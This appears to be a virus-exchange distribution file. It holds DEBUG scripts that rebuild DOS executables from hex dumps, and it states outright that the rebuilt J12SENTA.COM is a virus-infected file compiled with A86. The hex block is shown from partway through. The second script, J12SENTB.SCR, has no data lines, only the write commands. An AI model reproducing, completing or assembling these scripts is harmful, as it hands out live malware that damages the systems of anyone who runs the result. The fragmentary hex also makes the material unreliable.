E 02B0 63 61 74 69 6F 6E 61 6C 20 6F 72 20 72 65 73 65
E 02C0 61 72 63 68 20 70 75 72 70 6F 73 65 73 20 6F 6E
E 02D0 6C 79 2E 0D 0A 0A 0A 24 08 20 1A 0E 1F BA 07 01
E 02E0 B4 09 CD 21 B4 4C CD 21 3B 64 58 0E 00 00 15 1A
E 02F0 19 1A 19 1A A7 1B A7 1B 35 1A 95 1B 35 1A 95 1B
E 0300 40 19 40 19 22 19 22 19 6B 19 38 19 6A 19 38 19
E 0310 3B 19 C4 19 3B 3B E4 E4 3B 19 31 1A 3B 18 C4 19
E 0320 3B 07 E4 E4 3B 11 C4 19 3B 03 E4 E4 3B 1E 47 1A
E 0330 A8 1A 34 1A 3B 1D C4 19 3B 0F E4 E4 3B 1F DF 1A
E 0340 DF 1A 14 1A DF 1A DF 1A 3B 1E 31 1A 3B 18 C4 09
E 0350 E4 E4 3B 1E 34 1A A8 1A 47 1A 3B 1D C7 19 3B 0F
E 0360 E4 E4 3B 11 C7 19 3B 03 E4 E4 3B 19 31 1A 3B 18
E 0370 C7 19 3B 07 E4 E4 3B 19 C7 19 3B 3B E4 E4 40 16
E 0380 3A 15 FF 10 40 16 D1 0A FF 10 83 11 1B 11 83 11
E 0390 FF 10 83 11 40 16 40 16 3A 15 FF 10 40 16 D1 0A
E 03A0 FF 10 83 11 1B 11 83 11 FF 10 37 1B 40 16 3A 15
E 03B0 40 16 FF 10 FF 10 D1 0A D1 0A FF 10 FF 10 D1 0A
E 03C0 D1 0A 83 11 74 12 F2 13 EA 1C F2 13 40 16 3A 15
E 03D0 40 16 FF 10 FF 10 D1 0A D1 0A FF 10 FF 10 D1 0A
E 03E0 D1 0A 83 11 1B 11 83 11 FF 10 83 11 FF 10 40 16
E 03F0 37 1B 40 16 C1 14 40 16 1B 11 1B 11 F2 13 F2 13
E 0400 EA 1C F2 13 1B 11 F2 13 EA 1C 65 1C EA 1C F2 13
E 0410 EA 1C 1B 11 F2 13 83 11 83 11 1B 11 37 1B 40 16
E 0420 37 1B 16 9B 9A 56 3B 5A 3B 59 3B 4E 3B 53 3B 5A
E 0430 3B 42 1B 1A 3B 1B 0D 9B 15 49 7E 6B 6E 79 77 72
E 0440 70 7A 3B 75 7C 3B 4B 72 77 72 6B 72 75 7A 68 1B
E 0450 06 9B 12 2A 23 22 23 3B 9B 15 31 3B 9B 14 52 70
E 0460 7A 36 2A 29 3B 75 7C 3B 53 6E 75 62 74 3B 9B 15
E 0470 31 9B 17 3B 2A 22 22 23 1B 1A 3B 1B 37 9B 15 50
E 0480 7A 77 7A 62 7A 7A 75 9B 1C 3B 3B 31 3B 3B 9B 97
E 0490 52 48 5A 55 5C 3B 9B 94 5F 5A 5A 55 5C 3B 9B 92
E 04A0 4F 5A 54 55 9B 1C 3B 3B 31 3B 3B 9B 15 50 7A 68
E 04B0 7A 69 72 75 77 7A 75 1B 1B 3C 9B 1F 50 7A 6B 7A
E 04C0 6F 72 7F 37 3B 7A 75 74 75 7C 3B 75 7A 7C 7A 6C
E 04D0 7A 3B 76 74 3B 6B 7A 69 7A 3B 68 7A 3B 79 7A 62
E 04E0 7A 75 24 1B 1B 6B 6A 0B 6B 65 6B 6A 0B 6B 6A 0B
E 04F0 6B 65 65 65 6B 6A 0B 6B 65 65 65 65 65 6B 65 6B
E 0500 5A 6B 65 65 65 6B 6F 5B 6B 6F 5B 6B 65 6B 6F 5B
E 0510 6B 6F 5B 17 12 18 17 17 1F 1F 1F 12 18 17 17 17
E 0520 12 18 17 17 1F 1F 1F 12 18 1F 1F 1F 12 18 12 18
E 0530 12 18 12 18 12 18 12 18 17 1F 1F 1F 12 18 12 18
E 0540 12 18 12 18 1F 1F 1F 1F 1F 1F 17 1F 1F 1F 17 17
E 0550 17 17 12 18 12 18 17 1F 1F 1F 17 17 17 12 18 3F
E 0560 17 03 1E 0E 1F BE 97 02 BD 74 07 8A 04 34 2B 88
E 0570 04 46 3B F5 75 F5 1F C3 2E 80 2E 8F 02 04 EB 04
E 0580 B4 4C CD 21 E8 DB FF D7 91 B3 32 9F 01 E6 0A AA
E 0590 D1 B3 33 5E 1B 9B 2B 21 EB 5E 39 2D 25 34 94 2B
E 05A0 2A 7C 2D 95 41 2C 92 21 2B D8 8F 34 E0 A7 EB 2E
E 05B0 3B 2B 90 2B 2B 28 F3 A5 F8 97 2B 2B 2E 1F 39 7B
E 05C0 93 2B 2B 7B E0 25 34 25 3C 97 1B 24 A7 EB 18 DD
E 05D0 ED 2D A4 29 2F 90 41 2C ED 2C D8 88 26 28 88 3A
E 05E0 28 88 3E 28 2E 3B 2B A5 EB 92 9D 28 A0 D5 EC 6C
E 05F0 2A 8E E0 2D 43 3C 28 D4 C8 4B 24 AB 2B 4E 24 77
E 0600 2B 4E 24 47 2B 4E 24 A7 E3 A5 FB A5 F3 93 0A 1E
E 0610 E6 0A A2 35 90 28 A7 2D 96 28 91 82 28 9F 0E E6
E 0620 0A 90 28 2A 9F 61 A5 2D 26 28 E6 0A 18 D4 90 22
E 0630 28 0D A0 6E 07 A2 2C A5 EB 92 D4 54 A0 EC D9 85
E 0640 85 5E D0 84 A0 FC 9F 60 2D 34 25 2C B7 05 D4 35
E 0650 90 28 25 3C 97 1B 24 9F 66 E6 0A 7B 05 A5 2D 22
E 0660 28 9F 62 E6 0A 73 9F 1A 91 28 2A E6 0A 7B 7D 18
E 0670 DD 9F 30 A1 2F 19 EF A3 2F 6D AA D5 59 29 5E D8
E 0680 75 73 E8 4B 9F 01 E6 0A AA D1 27 2D 5E 22 35 2D
E 0690 25 34 C3 FB 29 2C 34 4A E8 B7 AB D7 01 5F 3B 16
E 06A0 2B 60 5F 3E AB D7 16 5F 3B B6 C1 D3 6B 3A 2B AA
E 06B0 D1 B3 32 5E DF 9D 33 B6 E4 4B 35 2D C3 A8 28 22
E 06C0 6A F1 13 FF 8D D8 8C C0 D0 C1 64 01 D0 6A C4 13
E 06D0 FF 55 2C C1 84 6A 90 67 F9 DE 13 FF C1 84 6A C4
E 06E0 13 FF D0 C1 54 DA 54 0E DA 9E 6A E4 7D D4 D1 6A
E 06F0 E8 13 FF AC EE 29 3D 29 3F D5 0C AB DB E3 AA D9
E 0700 AC FD D0 D9 67 DD DE 53 A2 D7 60 5B DA 56 F0 78
E 0710 DC 8F 88 89 2D 78 81 80 87 AB F7 5E 1F DA F5 27
E 0720 91 2D 78 AB F8 37 27 DF 97 AD B7 B0 BF BF A7 B1
E 0730 AD FE B0 B7 FE 8E AB AA B1 B5 AD BF FE 95 BF A9
E 0740 BF A7 BF B0 60 52 DA 2D 78 AB 04 60 23 D0 61 D2
E 0750 D1 6F D3 2D 7A 66 FA EB 13 FF 6A FB 64 5F DB D8
E 0760 8D 8E 13 FF D0 D9 64 D4 D1 ED 17 66 DF 9D 13 FF
E 0770 AD D3 37 79 DF 9D 91 93 93 9F 90 9A 9B 86 9B 66
E 0780 DC E3 42 F0 21 C0 65 DD AC 36 4D 67 21 21 64 CE
E 0790 25 66 DC 9C 13 FF AD BE 37 B1 DF 88 36 10 20 EC
E 07A0 3A 13 C4 4C D2 DF 7C A0 DC 54 0E DC 1A D2 DF 7C
E 07B0 5C DD EC 1A D2 DF 7C 82 D9 54 2E 36 71 20 61 B0
E 07C0 D9 89 ED 28 67 B4 D9 2D 7A 60 E3 D5 63 7C D3 54

RCX
0964
W
Q

── J12SENTA.SCR ENDS HERE ──────────────────────────────────────────



The virus in this infected file was compiled in A86 4.02.


── J12SENTB.SCR STARTS HERE ────────────────────────────────────────

N J12SENTB.COM

RCX
0964
W
Q

── J12SENTB.SCR ENDS HERE ──────────────────────────────────────────





-=<HF3>=-
